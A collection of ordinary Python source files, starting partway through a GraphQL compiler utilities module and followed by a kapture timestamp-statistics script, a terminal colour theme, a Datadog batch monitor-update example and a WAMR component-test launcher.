"FilterOperationInfo", ("directive", "field_ast", "field_name", "field_type")
)
T = TypeVar("T")
QueryPath = Tuple[str, ...]
FoldPath = Tuple[Tuple[str, str], ...]
def get_only_element_from_collection(one_element_collection: Collection[T]) -> T:
"""Assert that the collection has exactly one element, then return that element."""
if len(one_element_collection) != 1:
raise AssertionError(
"Expected a collection with exactly one element, but got: {}".format(
one_element_collection
)
)
return funcy.first(one_element_collection)
def get_field_type_from_schema(
schema_type: Union[GraphQLInterfaceType, GraphQLObjectType], field_name: str
) -> GraphQLOutputType:
"""Return the type of the field in the given type, accounting for field name normalization."""
if field_name == TYPENAME_META_FIELD_NAME:
return GraphQLString
else:
if field_name not in schema_type.fields:
raise AssertionError(
"Field {} passed validation but was not present on type "
"{}".format(field_name, schema_type)
)
# Validation guarantees that the field must exist in the schema.
return schema_type.fields[field_name].type
def get_vertex_field_type(
current_schema_type: Union[GraphQLInterfaceType, GraphQLObjectType], vertex_field_name: str
) -> Union[GraphQLInterfaceType, GraphQLObjectType]:
"""Return the type of the vertex within the specified vertex field name of the given type."""
# According to the schema, the vertex field itself is of type GraphQLList, and this is
# what get_field_type_from_schema returns. We care about what the type *inside* the list is,
# i.e., the type on the other side of the edge (hence .of_type).
# Validation guarantees that the field must exist in the schema.
if not is_vertex_field_name(vertex_field_name):
raise AssertionError(
"Trying to load the vertex field type of a non-vertex field: "
"{} {}".format(current_schema_type, vertex_field_name)
)
raw_field_type = get_field_type_from_schema(current_schema_type, vertex_field_name)
if not isinstance(strip_non_null_from_type(raw_field_type), GraphQLList):
raise AssertionError(
"Found an edge whose schema type was not GraphQLList: "
"{} {} {}".format(current_schema_type, vertex_field_name, raw_field_type)
)
field_type = cast(GraphQLList[Union[GraphQLInterfaceType, GraphQLObjectType]], raw_field_type)
return field_type.of_type
def strip_non_null_from_type(graphql_type: GraphQLOutputType) -> Any:
"""Return the GraphQL type stripped of its GraphQLNonNull annotations."""
while isinstance(graphql_type, GraphQLNonNull):
graphql_type = graphql_type.of_type
return graphql_type
def strip_non_null_and_list_from_type(graphql_type: GraphQLOutputType) -> Any:
"""Return the GraphQL type stripped of its GraphQLNonNull and GraphQLList annotations."""
while isinstance(graphql_type, (GraphQLNonNull, GraphQLList)):
graphql_type = graphql_type.of_type
return graphql_type
def get_edge_direction_and_name(vertex_field_name: str) -> Tuple[str, str]:
"""Get the edge direction and name from a non-root vertex field name."""
edge_direction = None
edge_name = None
if vertex_field_name.startswith(OUTBOUND_EDGE_FIELD_PREFIX):
edge_direction = OUTBOUND_EDGE_DIRECTION
edge_name = vertex_field_name[len(OUTBOUND_EDGE_FIELD_PREFIX) :]
elif vertex_field_name.startswith(INBOUND_EDGE_FIELD_PREFIX):
edge_direction = INBOUND_EDGE_DIRECTION
edge_name = vertex_field_name[len(INBOUND_EDGE_FIELD_PREFIX) :]
else:
raise AssertionError("Unreachable condition reached:", vertex_field_name)
validate_safe_string(edge_name)
return edge_direction, edge_name
def is_vertex_field_type(graphql_type: GraphQLOutputType) -> bool:
"""Return True if the argument is a vertex field type, and False otherwise."""
# This will need to change if we ever support complex embedded types or edge field types.
underlying_type = strip_non_null_from_type(graphql_type)
return isinstance(underlying_type, (GraphQLInterfaceType, GraphQLObjectType, GraphQLUnionType))
def is_graphql_type(graphql_type: Any) -> bool:
"""Return True if the argument is a GraphQL type object, and False otherwise."""
# Helper function to work around the fact that "is_type" is a poorly-named function.
return is_type(graphql_type)
def ensure_unicode_string(value: str) -> str:
"""Ensure the value is a string, and return it as unicode."""
if not isinstance(value, six.string_types):
raise TypeError("Expected string value, got: {}".format(value))
return six.text_type(value)
def get_uniquely_named_objects_by_name(
object_list: Iterable[ArgumentNode],
) -> Dict[str, ArgumentNode]:
"""Return dict of name -> object pairs from a list of objects with unique names.
Args:
object_list: iterable of AST argument nodes, each X of which
has a unique name accessible as X.name.value
Returns:
dict, { X.name.value: X for x in object_list }
If the list is empty or None, returns an empty dict.
"""
if not object_list:
return dict()
result: Dict[str, ArgumentNode] = dict()
for obj in object_list:
name = obj.name.value
if name in result:
raise GraphQLCompilationError(
"Found duplicate object key: {} {}".format(name, object_list)
)
result[name] = obj
return result
def safe_quoted_string(value: str) -> str:
"""Return the provided string, surrounded by single quotes. Ensure string is safe."""
validate_safe_string(value)
return "'{}'".format(value)
def safe_or_special_quoted_string(value: str) -> str:
"""Return the provided string, surrounded by single quotes. Ensure string is safe or special."""
validate_safe_or_special_string(value)
return "'{}'".format(value)
def validate_safe_or_special_string(value: str, value_description: str = "string") -> None:
"""Ensure the string does not have illegal characters or is in a set of allowed strings."""
# The following strings are explicitly allowed, despite having otherwise-illegal chars.
legal_strings_with_special_chars = frozenset({"@rid", "@class", "@this", "%"})
if value not in legal_strings_with_special_chars:
validate_safe_string(value, value_description=value_description)
def validate_safe_string(value: str, value_description: str = "string") -> None:
"""Ensure that the provided string not have illegal characters."""
if not value:
raise GraphQLCompilationError("Empty {}s are not allowed!".format(value_description))
if value[0] in string.digits:
raise GraphQLCompilationError(
"Encountered invalid {}: {}. It cannot start with a "
"digit.".format(value_description, value)
)
# set(value) is used instead of frozenset(value) to avoid printing 'frozenset' in error message.
disallowed_chars = set(value) - VARIABLE_ALLOWED_CHARS
if disallowed_chars:
raise GraphQLCompilationError(
"Encountered illegal characters {} in {}: {}. It is only "
"allowed to have upper and lower case letters, "
"digits and underscores.".format(disallowed_chars, value_description, value)
)
def validate_runtime_argument_name(name: str) -> None:
"""Ensure that the provided string is valid for use as a runtime argument name."""
validate_safe_string(name, value_description="runtime argument name")
def validate_tagged_argument_name(name: str) -> None:
"""Ensure that provided string is valid for use as a tagged argument name."""
validate_safe_string(name, value_description="tagged argument name")
def validate_output_name(name: str) -> None:
"""Ensure that the provided string is valid for use as an output name."""
internal_name_prefix = "___"
if name.startswith(internal_name_prefix):
raise GraphQLCompilationError(
'The prefix "___" (three underscores) for output names is reserved by the compiler.'
)
validate_safe_string(name, value_description="output name")
def validate_edge_direction(edge_direction: str) -> None:
"""Ensure the provided edge direction is either "in" or "out"."""
if not isinstance(edge_direction, six.string_types):
raise TypeError(
"Expected string edge_direction, got: {} {}".format(
type(edge_direction), edge_direction
)
)
if edge_direction not in ALLOWED_EDGE_DIRECTIONS:
raise ValueError("Unrecognized edge direction: {}".format(edge_direction))
def validate_marked_location(location: "BaseLocation") -> None:
"""Validate that a Location object is safe for marking, and not at a field."""
if not isinstance(location, BaseLocation):
raise TypeError(
"Expected a BaseLocation, got: {} {}".format(type(location).__name__, location)
)
if location.field is not None:
raise GraphQLCompilationError("Cannot mark location at a field: {}".format(location))
def _create_fold_path_component(edge_direction: str, edge_name: str) -> Tuple[Tuple[str, str], ...]:
"""Return a tuple representing a fold_path component of a FoldScopeLocation."""
return ((edge_direction, edge_name),) # tuple containing a tuple of two elements
KeyT = TypeVar("KeyT", bound=Hashable)
ValueT = TypeVar("ValueT", bound=Hashable)
def invert_dict(invertible_dict: Dict[KeyT, ValueT]) -> Dict[ValueT, KeyT]:
"""Invert a dict. A dict is invertible if values are unique and hashable."""
inverted: Dict[ValueT, KeyT] = {}
for k, v in six.iteritems(invertible_dict):
if not isinstance(v, Hashable):
raise TypeError(
"Expected an invertible dict, but value at key {} has type {}".format(
k, type(v).__name__
)
)
if v in inverted:
raise TypeError(
"Expected an invertible dict, but keys "
"{} and {} map to the same value".format(inverted[v], k)
)
inverted[v] = k
return inverted
def is_runtime_parameter(argument: str) -> bool:
"""Return True if the directive argument defines a runtime parameter, and False otherwise."""
return argument.startswith("$")
def is_tagged_parameter(argument: str) -> bool:
"""Return True if the directive argument defines a tagged parameter, and False otherwise."""
return argument.startswith("%")
def get_parameter_name(argument: str) -> str:
"""Return the name of the parameter without the leading prefix."""
if argument[0] not in {"$", "%"}:
raise AssertionError(
"Unexpectedly received an unprefixed parameter name, unable to "
"determine whether it is a runtime or tagged parameter: {}".format(argument)
)
return argument[1:]
LocationT = TypeVar("LocationT", bound="BaseLocation")
# Issue below might be due to https://github.com/python/mypy/issues/5374
# Feel free to remove this mypy exception if you get mypy to pass
@total_ordering # type: ignore
@six.add_metaclass(ABCMeta)
class BaseLocation(object):
"""An abstract location object, describing a location in the GraphQL query."""
field: Optional[str]
@abstractmethod
def navigate_to_field(self: LocationT, field: str) -> LocationT:
"""Return a new BaseLocation object at the specified field of the current BaseLocation."""
raise NotImplementedError()
@abstractmethod
def at_vertex(self: LocationT) -> LocationT:
"""Get the BaseLocation ignoring its field component."""
raise NotImplementedError()
@abstractmethod
def navigate_to_subpath(self: LocationT, child: str) -> LocationT:
"""Return a new BaseLocation after a traversal to the specified child location."""
raise NotImplementedError()
@abstractmethod
def get_location_name(self) -> Tuple[str, Optional[str]]:
"""Return a tuple of a unique name of the location, and the current field name (or None)."""
raise NotImplementedError()
def get_location_at_field_name(self) -> Tuple[str, str]:
"""Assert the location is at a field, then return the same value as get_location_name()."""
mark_name, field_name = self.get_location_name()
if field_name is None:
raise AssertionError(
"Expected the location {} to be at a field, but it was not."
"This is a bug.".format(self)
)
return (mark_name, field_name)
@abstractmethod
def _check_if_object_of_same_type_is_smaller(self: LocationT, other: LocationT) -> bool:
"""Return True if the other object is smaller than self in the total ordering."""
raise NotImplementedError()
@abstractmethod
def __eq__(self, other: Any) -> bool:
"""Return True if the BaseLocations are equal, and False otherwise."""
raise NotImplementedError()
def __lt__(self, other: "BaseLocation") -> bool:
"""Return True if the other object is smaller than self in the total ordering."""
if isinstance(self, Location) and isinstance(other, Location):
return self._check_if_object_of_same_type_is_smaller(other)
elif isinstance(self, FoldScopeLocation) and isinstance(other, FoldScopeLocation):
return self._check_if_object_of_same_type_is_smaller(other)
elif isinstance(self, Location) and isinstance(other, FoldScopeLocation):
return _compare_location_and_fold_scope_location(self, other)
elif isinstance(self, FoldScopeLocation) and isinstance(other, Location):
return not _compare_location_and_fold_scope_location(other, self)
else:
raise AssertionError(
"Received objects of types {}, {} in BaseLocation comparison. "
"Only Location and FoldScopeLocation are allowed: {} {}".format(
type(self).__name__, type(other).__name__, self, other
)
)
@six.python_2_unicode_compatible
class Location(BaseLocation):
"""A location in the GraphQL query, anywhere except within a @fold scope."""
query_path: QueryPath
visit_counter: int
def __init__(
self, query_path: Tuple[str, ...], field: Optional[str] = None, visit_counter: int = 1
) -> None:
"""Create a new Location object.
Used to uniquely identify locations in the graph traversal, with three components.
- The 'query_path' is a tuple containing the in-order nested set of vertex fields where
the Location is.
- The 'field' is a string set to the name of a property field, if the
Location is at a property field, or None otherwise.
- The 'visit_counter' is a counter that disambiguates between consecutive,
but semantically different, visits to the same 'query_path' and 'field'.
In the following example, note that the Location objects for 'X' and 'Y'
have identical values for both 'query_path' (empty tuple) and 'field' (None),
but are not semantically equivalent:
g.as('X').out('foo').back('X').as('Y').out('bar').optional('Y')
The difference between 'X' and 'Y' is in the .optional() statement --
.optional('Y') says that the 'bar' edge is optional, and .optional('X') says that
both 'foo' and 'bar' are optional. Hence, the Location objects for 'X' and 'Y'
should have different 'visit_counter' values.
Args:
query_path: tuple of strings, in-order, one for each vertex in the
current nested position in the graph
field: string if at a field in a vertex, or None if at a vertex
visit_counter: int, number that allows semantic disambiguation of otherwise equivalent
Location objects -- see the explanation above.
Returns:
new Location object with the provided properties
"""
if not isinstance(query_path, tuple):
raise TypeError(
"Expected query_path to be a tuple, was: "
"{} {}".format(type(query_path).__name__, query_path)
)
if field and not isinstance(field, six.string_types):
raise TypeError(
"Expected field to be None or string, was: "
"{} {}".format(type(field).__name__, field)
)
self.query_path = query_path
self.field = field
# A single visit counter is enough, rather than a visit counter per path level,
# because field names are unique -- one can't be at path 'X' and
# visit 'Y' in two different ways to generate colliding 'X__Y___1' identifiers.
self.visit_counter = visit_counter
def navigate_to_field(self, field: str) -> "Location":
"""Return a new Location object at the specified field of the current Location's vertex."""
if self.field:
raise AssertionError("Already at a field, cannot nest fields: {}".format(self))
return Location(self.query_path, field=field, visit_counter=self.visit_counter)
def at_vertex(self) -> "Location":
"""Get the Location ignoring its field component."""
if not self.field:
return self
return Location(self.query_path, field=None, visit_counter=self.visit_counter)
def navigate_to_subpath(self, child: str) -> "Location":
"""Return a new Location object at a child vertex of the current Location's vertex."""
if not isinstance(child, six.string_types):
raise TypeError("Expected child to be a string, was: {}".format(child))
if self.field:
raise AssertionError("Currently at a field, cannot go to child: {}".format(self))
return Location(self.query_path + (child,))
def navigate_to_fold(self, folded_child: str) -> "FoldScopeLocation":
"""Return a new FoldScopeLocation for the folded child vertex of the current Location."""
if not isinstance(folded_child, six.string_types):
raise TypeError("Expected folded_child to be a string, was: {}".format(folded_child))
if self.field:
raise AssertionError("Currently at a field, cannot go to folded child: {}".format(self))
edge_direction, edge_name = get_edge_direction_and_name(folded_child)
fold_path = _create_fold_path_component(edge_direction, edge_name)
return FoldScopeLocation(self, fold_path)
def revisit(self) -> "Location":
"""Return a new Location object with an incremented 'visit_counter'."""
if self.field:
raise AssertionError("Attempted to revisit a location at a field: {}".format(self))
return Location(self.query_path, field=None, visit_counter=(self.visit_counter + 1))
def get_location_name(self) -> Tuple[str, Optional[str]]:
"""Return a tuple of a unique name of the Location, and the current field name (or None)."""
mark_name = "__".join(self.query_path) + "___" + six.text_type(self.visit_counter)
return (mark_name, self.field)
def is_revisited_at(self, other_location: BaseLocation) -> bool:
"""Return True if other_location is a revisit of this location, and False otherwise."""
# Note that FoldScopeLocation objects cannot revisit Location objects, or each other.
return (
isinstance(other_location, Location)
and self.query_path == other_location.query_path
and self.visit_counter < other_location.visit_counter
)
def __str__(self) -> str:
"""Return a human-readable str representation of the Location object."""
return "Location({}, {}, {})".format(self.query_path, self.field, self.visit_counter)
def __repr__(self) -> str:
"""Return a human-readable str representation of the Location object."""
return self.__str__()
def __eq__(self, other: Any) -> bool:
"""Return True if the Locations are equal, and False otherwise."""
return (
type(self) == type(other)
and self.query_path == other.query_path
and self.field == other.field
and self.visit_counter == other.visit_counter
)
def __ne__(self, other: Any) -> bool:
"""Check another object for non-equality against this one."""
return not self.__eq__(other)
def _check_if_object_of_same_type_is_smaller(self, other: "Location") -> bool:
"""Return True if the other object is smaller than self in the total ordering."""
if not isinstance(other, Location):
raise AssertionError(
"Expected Location type for other. Received {}: {}".format(
type(other).__name__, other
)
)
if len(self.query_path) != len(other.query_path):
return len(self.query_path) < len(other.query_path)
if self.query_path != other.query_path:
return self.query_path < other.query_path
if self.visit_counter != other.visit_counter:
return self.visit_counter < other.visit_counter
if self.field is None:
return other.field is not None
if other.field is None:
return False
return self.field < other.field
def __hash__(self) -> int:
"""Return the object's hash value."""
return hash(self.query_path) ^ hash(self.field) ^ hash(self.visit_counter)
@six.python_2_unicode_compatible
class FoldScopeLocation(BaseLocation):
"""A location within a @fold scope."""
base_location: Location
fold_path: FoldPath
def __init__(
self,
base_location: Location,
fold_path: Tuple[Tuple[str, str], ...],
field: Optional[str] = None,
) -> None:
"""Create a new FoldScopeLocation object. Used to represent the locations of @fold scopes.
Args:
base_location: Location object defining where the @fold scope is rooted. In other words,
the location of the tightest scope that fully contains the @fold scope.
fold_path: tuple of (edge_direction, edge_name) tuples, containing the traversal path
of the fold, starting from the base_location of the @fold scope.
field: string if at a field in a vertex, or None if at a vertex
Returns:
new FoldScopeLocation object
"""
if not isinstance(base_location, Location):
raise TypeError(
"Expected a Location for base_location, got: "
"{} {}".format(type(base_location), base_location)
)
if base_location.field:
raise ValueError(
"Expected Location object that points to a vertex, got: {}".format(base_location)
)
if not isinstance(fold_path, tuple) or len(fold_path) == 0:
raise TypeError(
"Expected fold_path to be a non-empty tuple, but got: {} {}".format(
type(fold_path), fold_path
)
)
fold_path_is_valid = all(
len(element) == 2 and element[0] in ALLOWED_EDGE_DIRECTIONS for element in fold_path
)
if not fold_path_is_valid:
raise ValueError("Encountered an invalid fold_path: {}".format(fold_path))
self.base_location = base_location
self.fold_path = fold_path
self.field = field
def get_location_name(self) -> Tuple[str, Optional[str]]:
"""Return a tuple of a unique name of the location, and the current field name (or None)."""
# We currently require that all outputs from a given fold are from the same location:
# any given fold has one set of traversals away from the root, and all outputs are
# at the tip of the set of traversals.
#
# Therefore, for the purposes of creating a unique edge name, it's sufficient to take
# only one traversal from the root of the fold. This allows fold names to be shorter.
first_folded_edge_direction, first_folded_edge_name = self.get_first_folded_edge()
unique_name = "".join(
(
self.base_location.get_location_name()[0],
"___",
first_folded_edge_direction,
"_",
first_folded_edge_name,
)
)
return (unique_name, self.field)
def get_first_folded_edge(self) -> Tuple[str, str]:
"""Return a tuple representing the first folded edge within the fold scope."""
# The constructor of this object guarantees that the fold has at least one traversal,
# so the [0]-indexing is guaranteed to not raise an exception.
first_folded_edge_direction, first_folded_edge_name = self.fold_path[0]
return first_folded_edge_direction, first_folded_edge_name
def at_vertex(self) -> "FoldScopeLocation":
"""Get the FoldScopeLocation ignoring its field component."""
if not self.field:
return self
return FoldScopeLocation(self.base_location, self.fold_path, field=None)
def navigate_to_field(self, field: str) -> "FoldScopeLocation":
"""Return a new location object at the specified field of the current location."""
if self.field:
raise AssertionError("Already at a field, cannot nest fields: {}".format(self))
return FoldScopeLocation(self.base_location, self.fold_path, field=field)
def navigate_to_subpath(self, child: str) -> "FoldScopeLocation":
"""Return a new location after a traversal to the specified child location."""
if not isinstance(child, six.string_types):
raise TypeError("Expected child to be a string, was: {}".format(child))
if self.field:
raise AssertionError("Currently at a field, cannot go to child: {}".format(self))
edge_direction, edge_name = get_edge_direction_and_name(child)
new_fold_path = self.fold_path + _create_fold_path_component(edge_direction, edge_name)
return FoldScopeLocation(self.base_location, new_fold_path)
def __str__(self) -> str:
"""Return a human-readable str representation of the FoldScopeLocation object."""
return "FoldScopeLocation({}, {}, field={})".format(
self.base_location, self.fold_path, self.field
)
def __repr__(self) -> str:
"""Return a human-readable str representation of the FoldScopeLocation object."""
return self.__str__()
def __eq__(self, other: Any) -> bool:
"""Return True if the FoldScopeLocations are equal, and False otherwise."""
return (
type(self) == type(other)
and self.base_location == other.base_location
and self.fold_path == other.fold_path
and self.field == other.field
)
def __ne__(self, other: Any) -> bool:
"""Check another object for non-equality against this one."""
return not self.__eq__(other)
def __hash__(self) -> int:
"""Return the object's hash value."""
return hash(self.base_location) ^ hash(self.fold_path) ^ hash(self.field)
def _check_if_object_of_same_type_is_smaller(self, other: "FoldScopeLocation") -> bool:
"""Return True if the other object is smaller than self in the total ordering."""
if not isinstance(other, FoldScopeLocation):
raise AssertionError(
"Expected FoldScopeLocation type for other. Received {}: {}".format(
type(other).__name__, other
)
)
if self.base_location != other.base_location:
return self.base_location < other.base_location
if len(self.fold_path) != len(other.fold_path):
return len(self.fold_path) < len(other.fold_path)
if self.fold_path != other.fold_path:
return self.fold_path < other.fold_path
if self.field is None:
return other.field is not None
if other.field is None:
return False
return self.field < other.field
def _compare_location_and_fold_scope_location(
location: Location, fold_scope_location: FoldScopeLocation
) -> bool:
"""Return True if in our desired lexicographic ordering has location < fold_scope_location."""
# This helper makes it easier to implement the correct ordering logic while keeping mypy happy.
if location != fold_scope_location.base_location:
return location < fold_scope_location.base_location
return False
def get_vertex_path(location: BaseLocation) -> VertexPath:
"""Return a path leading to the vertex. The field component of the location is ignored."""
if isinstance(location, Location):
return location.query_path
elif isinstance(location, FoldScopeLocation):
return location.base_location.query_path + tuple(
f"{direction}_{edge_name}" for direction, edge_name in location.fold_path
)
else:
raise AssertionError(f"Unknown type {type(location)}: {location}")
|
tools/kapture_data_date_ranges.py | v-mehta/kapture | 264 | 11179830 | <reponame>v-mehta/kapture<gh_stars>100-1000
#!/usr/bin/env python3
# Copyright 2020-present NAVER Corp. Under BSD 3-clause license
"""
Script to print statistics about kapture data.
"""
import argparse
import logging
import os
import os.path as path
import re
from datetime import datetime
import path_to_kapture # noqa: F401
import kapture
import kapture.utils.computation as computation
import kapture.utils.logging
import kapture.io.csv
logger = logging.getLogger('kapture_data_date')
KAPTURE_FILE_PARSING_RE = re.compile('.*(records|trajectories).*\\.txt')
def format_timestamp_range(first_timestamp: int, last_timestamp: int) -> str:
"""
Format a time range with unit.
:param first_timestamp: first timestamp
:param last_timestamp: last timestamp
:return string: formatted time range
"""
timestamp_len = 1
try:
timestamp_len = computation.num_digits(first_timestamp)
delta_len = 10 - timestamp_len # datetime expects epoch timestamp in seconds
factor = 10**delta_len
dts = [datetime.utcfromtimestamp(first_timestamp * factor),
datetime.utcfromtimestamp(last_timestamp * factor)]
timestamp_format_d = {
'date': '%Y/%m/%d',
'time': '%H:%M:%S.%f'
}
timestamp_parts = [
{
pname: dt.strftime(pformat)
for pname, pformat in timestamp_format_d.items()
}
for dt in dts
]
timestamp_str = timestamp_parts[0]['date'] + ' ' + timestamp_parts[0]['time']
timestamp_str += ' -> '
if timestamp_parts[0]['date'] != timestamp_parts[1]['date']:
timestamp_str = timestamp_parts[0]['date'] + ' '
timestamp_str += timestamp_parts[1]['time'] + ' GMT'
return timestamp_str
except ValueError as _: # noqa: F841
return f'{first_timestamp} -> {last_timestamp}' \
+ f' ** FAIL to parse as posix timestamp of {timestamp_len} digits'
def print_info(kapture_path: str, kapture_filename: str) -> None:
"""
Prints some info on given file that should contains records with timestamps
:param kapture_path: kapture top directory
:param kapture_filename: full path of a valid kapture file
"""
# Check version to test if this is a real kapture file
kapture_file_path = path.join(kapture_path, kapture_filename)
version = kapture.io.csv.get_version_from_csv_file(kapture_file_path)
if version is None:
logger.debug(f'{kapture_filename} not a kapture file')
else:
# Read the file
last_data_line = ''
nb_lines = 0
with open(kapture_file_path) as f:
# Count lines
for _ in f:
nb_lines += 1
# Reset to read some important lines
f.seek(0, os.SEEK_SET)
# Skip header
f.readline()
f.readline()
first_data_line = f.readline()
if first_data_line:
last_data_line = kapture.io.csv.get_last_line(f)
first_timestamp = 0
last_timestamp = 0
# data line are comma separated lines with the timestamp as first value
try:
if first_data_line:
first_timestamp = int(first_data_line.split(',')[0])
if last_data_line:
last_timestamp = int(last_data_line.split(',')[0])
except ValueError:
pass
if first_timestamp > 0 and last_timestamp > 0:
timestamp_range_str = format_timestamp_range(first_timestamp, last_timestamp)
timestamp_len1 = computation.num_digits(first_timestamp)
timestamp_len2 = computation.num_digits(last_timestamp)
timestamp_len_str = f'{timestamp_len1}' if timestamp_len1 == timestamp_len2\
else f'{timestamp_len1}-{timestamp_len2}'
print(f'{kapture_filename:42s} timestamp {timestamp_len_str} digits from {timestamp_range_str}'
f' : {(nb_lines-2):12,d} records'.replace(',', ' '))
def do_print(kapture_path: str) -> None:
"""
Print out kapture data:
:param kapture_path: full path to kapture directory.
"""
dirs_to_examine = set()
for k_path in kapture.io.csv.CSV_FILENAMES.values():
dirs_to_examine.add(path.dirname(k_path))
# Look for files which might contain kapture data
for k_dir in sorted(dirs_to_examine):
kapture_dir = path.join(kapture_path, k_dir)
if path.exists(kapture_dir):
if path.isdir(kapture_dir):
# print
logger.debug(f'browsing directory {k_dir}')
# Search for records or trajectory like files
kapture_files = []
for entry in os.listdir(kapture_dir):
if path.isfile(path.join(kapture_dir, entry)):
if KAPTURE_FILE_PARSING_RE.match(entry) is not None:
kapture_files.append(entry)
for kapture_file in sorted(kapture_files):
print_info(kapture_path, path.join(k_dir, kapture_file))
else:
logger.fatal(f'{kapture_dir} is not a directory')
else:
logger.debug(f'{kapture_dir} does not exist')
def print_command_line() -> None:
"""
Do the print using the parameters given on the command line.
"""
parser = argparse.ArgumentParser(description='Print statistics about kapture records files with timestamps.')
parser_verbosity = parser.add_mutually_exclusive_group()
parser_verbosity.add_argument(
'-v', '--verbose', nargs='?', default=logging.WARNING, const=logging.INFO,
action=kapture.utils.logging.VerbosityParser,
help='verbosity level (debug, info, warning, critical, ... or int value) [warning]')
parser_verbosity.add_argument(
'-q', '--silent', '--quiet', action='store_const', dest='verbose', const=logging.CRITICAL)
parser.add_argument('-k', '--kapture', required=True,
help='path to kapture data root directory.')
args = parser.parse_args()
logger.setLevel(args.verbose)
if args.verbose <= logging.DEBUG:
# also let kapture express its logs
kapture.utils.logging.getLogger().setLevel(args.verbose)
do_print(path.abspath(args.kapture))
if __name__ == '__main__':
print_command_line()
|
pymterm/colour/zenburn_2.py | stonewell/pymterm | 102 | 11179873 | <reponame>stonewell/pymterm
_color0 = '000d18'
_color8 = '000d18'
_color1 = 'e89393'
_color9 = 'e89393'
_color2 = '9ece9e'
_color10 = '9ece9e'
_color3 = 'f0dfaf'
_color11 = 'f0dfaf'
_color4 = '8cd0d3'
_color12 = '8cd0d3'
_color5 = 'c0bed1'
_color13 = 'c0bed1'
_color6 = 'dfaf8f'
_color14 = 'dfaf8f'
_color7 = 'efefef'
_color15 = 'efefef'
_colorBD = 'ffcfaf'
_colorUL = 'ccdc90'
_colorIT = '80d4aa'
_foreground = 'dcdccc'
_background = '1f1f1f'
_cursorColor = '8faf9f'
COLOR_PALLETE = [
_color0,
_color1,
_color2,
_color3,
_color4,
_color5,
_color6,
_color7,
_color8,
_color9,
_color10,
_color11,
_color12,
_color13,
_color14,
_color15,
]
def parse_color(c):
r = int(c[:2], 16)
g = int(c[2:4], 16)
b = int(c[4:6], 16)
return [r, g, b, 0xFF]
def apply_color(cfg, color_table):
cfg.default_foreground_color = parse_color(_foreground)
cfg.default_background_color = parse_color(_background)
cfg.default_cursor_color = parse_color(_cursorColor)
for i in range(len(COLOR_PALLETE)):
if i < len(color_table):
color_table[i] = parse_color(COLOR_PALLETE[i])
return True
|
batchMonitorUpdate/batchUpdateReturnAll.py | Manny27nyc/Miscellany | 155 | 11179879 | from datadog import initialize, api
import datadog_api_client.v1
from dateutil.parser import parse as dateutil_parser
from datadog_api_client.v1 import ApiClient, ApiException, Configuration
from datadog_api_client.v1.api import monitors_api
from datadog_api_client.v1.models import *
from pprint import pprint
options = {
'api_key': '<your-api-key',
'app_key': '<your-app-key>'
}
# Script that allows for updating batches of monitors programmatically.
initialize(**options)
if __name__=="__main__":
monitorList = api.Monitor.get_all() # Returns a list of dictionaries containing monitor details.
for monitor in monitorList: # Iterate over all returned monitors
# Keys present in monitor dictionary
# dict_keys(['restricted_roles', 'tags', 'deleted', 'query', 'message', 'matching_downtimes', 'id', 'multi', 'name', 'created', 'created_at', 'creator', 'org_id', 'modified', 'priority', 'overall_state_modified', 'overall_state', 'type', 'options'])
# Monitor API https://docs.datadoghq.com/api/latest/monitors/
# Example to change an email present in the notification section
message = monitor.get('message')
if 'datadoghq.com' in message:
api.Monitor.update(monitor.get('id'),message=message.replace('datadoghq.com', 'doge.com')) |
test-tools/component_test/start.py | BernardXiong/wasm-micro-runtime | 1,723 | 11179898 | <reponame>BernardXiong/wasm-micro-runtime
#
# Copyright (C) 2019 Intel Corporation. All rights reserved.
# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
#
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
It is the entrance of the iagent test framework.
"""
import argparse
import datetime
import os
import pprint
import random
import re
import shlex
import subprocess
import signal
import sys
import time
sys.path.append('../../../app-sdk/python')
from framework.test_utils import *
from framework.framework import *
def signal_handler(signal, frame):
print('Pressed Ctrl+C!')
sys.exit(0)
def Register_signal_handler():
signal.signal(signal.SIGINT, signal_handler)
# signal.pause()
def flatten_args_list(l):
if l is None:
return None
return [x for y in l for x in y]
if __name__ == "__main__":
parser = argparse.ArgumentParser(description = "to run specific case(s) "\
"in specific suite(s) with FC test framework")
parser.add_argument('-s', dest = 'suite_id', action = 'append',
nargs = '+',
help = 'one or multiple suite ids, which are also setup ids.'\
'by default if it isn\'t passed from argument, all '\
'suites are going to be run.')
parser.add_argument('-t', dest = 'case_id', action = 'append',
nargs = '+',
help = 'one or multiple cases ids.'\
'by default if it isn\'t passed from argument, all '\
'cases in specific suites are going to be run.')
parser.add_argument('-n', dest = 'repeat_time', action = 'store',
default = 1,
help = 'how many times do you want to run. there is 40s '\
'break time between two rounds. each round includs '\
'init_setup, run_test_case and deinit_setup.')
parser.add_argument('--shuffle_all', dest = 'shuffle_all',
default = False, action = 'store_true',
help = 'shuffle_all test cases in per test suite '\
'by default, all cases under per suite should '\
'be executed by input order.')
parser.add_argument('--cases_list', dest='cases_list_file_path',
default=None,
action='store',
help="read cases list from a flie ")
parser.add_argument('--skip_proc', dest='skip_proc',
default = False, action = 'store_true',
help='do not start the test process.'\
'sometimes the gw_broker process will be started in eclipse for debug purpose')
parser.add_argument('-b', dest = 'binaries', action = 'store',
help = 'The path of target folder ')
parser.add_argument('-d', dest = 'debug', action = 'store_true',
help = 'wait user to attach the target process after launch processes ')
parser.add_argument('--rebuild', dest = 'rebuild', action = 'store_true',
help = 'rebuild all test binaries')
args = parser.parse_args()
print "------------------------------------------------------------"
print "parsing arguments ... ..."
print args
'''
logger = logging.getLogger('coapthon.server.coap')
logger.setLevel(logging.DEBUG)
console = logging.StreamHandler()
console.setLevel(logging.DEBUG)
logger.addHandler(console)
'''
print "------------------------------------------------------------"
print "preparing wamr binary and test tools ... ..."
os.system("cd ../../samples/simple/ && bash build.sh -p host-interp")
Register_signal_handler()
api_init_globals();
api_create_case_event();
suites_list = flatten_args_list(args.suite_id)
cases_list = flatten_args_list(args.case_id)
dirname, filename = os.path.split(os.path.abspath(sys.argv[0]))
api_set_root_path(dirname);
framework = CTestFramework(dirname);
framework.repeat_time = int(args.repeat_time)
framework.shuffle_all = args.shuffle_all
framework.skip_proc=args.skip_proc
api_set_value('keep_env', args.skip_proc)
api_set_value('debug', args.debug)
api_set_value('rebuild', args.rebuild)
binary_path = args.binaries
if binary_path is None:
binary_path = os.path.abspath(dirname + '/../..')
print "checking execution binary path: " + binary_path
if not os.path.exists(binary_path):
print "The execution binary path was not available. quit..."
os._exit(0)
api_set_value('binary_path', binary_path)
if suites_list is not None:
framework.target_suites = suites_list
else:
framework.load_suites()
